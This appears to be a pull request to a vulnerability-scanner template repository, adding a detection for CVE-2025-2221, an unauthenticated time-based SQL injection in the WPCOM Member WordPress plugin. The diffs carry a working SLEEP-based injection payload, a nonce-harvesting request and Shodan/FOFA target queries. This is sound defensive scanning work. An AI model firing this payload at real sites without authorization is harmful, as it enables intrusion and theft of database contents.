### PR TITLE
Add CVE-2025-2221 - WordPress WPCOM Member SQL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-2221.yaml
+++ b/http/cves/2025/CVE-2025-2221.yaml
@@ -1,0 +1,65 @@
+id: CVE-2025-2221
+
+info:
+  name: WordPress WPCOM Member <= 1.7.6 - SQL Injection
+  author: neosmith1
+  severity: high
+  description: |
+    The WPCOM Member plugin for WordPress is vulnerable to SQL injection via the 'user_phone' parameter in the wpcom_member_login AJAX action in all versions up to and including 1.7.6. This allows unauthenticated attackers to append additional SQL queries to extract sensitive information from the database.
+  impact: |
+    Unauthenticated attackers can extract sensitive data from the WordPress database including user credentials, personal information, and site configuration data.
+  remediation: |
+    Update the WPCOM Member plugin to a version higher than 1.7.6 where the vulnerability has been patched.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-2221
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcom-member/wpcom-member-176-unauthenticated-sql-injection
+    - https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.6/includes/class-sesstion.php#L35
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: developer
+    product: wpcom-member
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,wpcom-member
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/wpcom-member/readme.txt'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "compare_versions(version, '<= 1.7.6')"
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        part: body
+        name: version
+        group: 1
+        regex:
+          - 'Stable tag: ([0-9.]+)'
+        internal: true
+
+  - method: POST
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "action=wpcom_member_login&user_phone=1' AND (SELECT 1 FROM (SELECT SLEEP(6))a)--+-"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration >= 6"
+          - "status_code == 200"
+        condition: and

--- a/http/cves/2025/CVE-2025-2221.yaml
+++ b/http/cves/2025/CVE-2025-2221.yaml
@@ -1,15 +1,15 @@
 id: CVE-2025-2221
 
 info:
-  name: WordPress WPCOM Member <= 1.7.6 - SQL Injection
-  author: neosmith1
+  name: WordPress WPCOM Member <= 1.7.6 - Unauthenticated SQL Injection
+  author: neosmith1,0x_Akoko
   severity: high
   description: |
-    The WPCOM Member plugin for WordPress is vulnerable to SQL injection via the 'user_phone' parameter in the wpcom_member_login AJAX action in all versions up to and including 1.7.6. This allows unauthenticated attackers to append additional SQL queries to extract sensitive information from the database.
+   WPCOM Member plugin for WordPress up to 1.7.6 contains a time-based SQL Injection caused by insufficient escaping and lack of preparation on the 'user_phone' parameter, letting unauthenticated attackers extract sensitive information, exploit requires sending crafted 'user_phone' parameter.
   impact: |
-    Unauthenticated attackers can extract sensitive data from the WordPress database including user credentials, personal information, and site configuration data.
+   Attackers can extract sensitive database information, potentially leading to data breach and privacy violations.
   remediation: |
-    Update the WPCOM Member plugin to a version higher than 1.7.6 where the vulnerability has been patched.
+   Update to the latest version of the plugin that addresses this vulnerability.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-2221
     - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcom-member/wpcom-member-176-unauthenticated-sql-injection
@@ -17,49 +17,58 @@ info:
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
+    cve-id: CVE-2025-2221
     cwe-id: CWE-89
   metadata:
     verified: true
     max-request: 2
-    vendor: developer
+    vendor: Bastien Ho
     product: wpcom-member
     shodan-query: http.component:"WordPress"
-  tags: cve,cve2025,wordpress,wp-plugin,sqli,wpcom-member
+    fofa-query: body="wpcom-member"
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,wpcom-member,unauthenticated
 
 flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/wpcom-member/readme.txt'
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-    matchers:
-      - type: dsl
-        dsl:
-          - "status_code == 200"
-          - "compare_versions(version, '<= 1.7.6')"
-        condition: and
-        internal: true
+        action=wpcom_login_modal&type=login
 
     extractors:
       - type: regex
-        part: body
-        name: version
+        name: nonce
         group: 1
         regex:
-          - 'Stable tag: ([0-9.]+)'
+          - 'member_form_login_nonce" value="([a-z0-9]+)"'
+        part: body
         internal: true
-
-  - method: POST
-    path:
-      - '{{BaseURL}}/wp-admin/admin-ajax.php'
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: "action=wpcom_member_login&user_phone=1' AND (SELECT 1 FROM (SELECT SLEEP(6))a)--+-"
 
     matchers:
       - type: dsl
         dsl:
-          - "duration >= 6"
-          - "status_code == 200"
+          - status_code == 200
+          - contains(body, "member_form_login_nonce")
+          - nonce != ""
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 25s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wpcom_login&user_phone=1%27+AND+%28SELECT+1+FROM+%28SELECT+SLEEP%286%29%29a%29--+-&sms_code=123456&member_form_login_nonce={{nonce}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - duration >= 6
+          - status_code == 200
         condition: and

--- a/http/cves/2025/CVE-2025-2221.yaml
+++ b/http/cves/2025/CVE-2025-2221.yaml
@@ -1,7 +1,7 @@
 id: CVE-2025-2221
 
 info:
-  name: WordPress WPCOM Member <= 1.7.6 - Unauthenticated SQL Injection
+  name: WordPress WPCOM Member <= 1.7.6 - SQL Injection
   author: neosmith1,0x_Akoko
   severity: high
   description: |
@@ -11,9 +11,9 @@ info:
   remediation: |
    Update to the latest version of the plugin that addresses this vulnerability.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-2221
     - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcom-member/wpcom-member-176-unauthenticated-sql-injection
     - https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.6/includes/class-sesstion.php#L35
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-2221
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5


### PR DESCRIPTION
## Template Details

- **CVE**: CVE-2025-2221
- **Product**: WPCOM Member WordPress Plugin
- **Vulnerability**: Unauthenticated SQL Injection
- **Severity**: High (7.5 CVSS)
- **Detection**: Time-based blind SQL injection via user_phone parameter

### References
- https://nvd.nist.gov/vuln/detail/CVE-2025-2221
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcom-member/wpcom-member-176-unauthenticated-sql-injection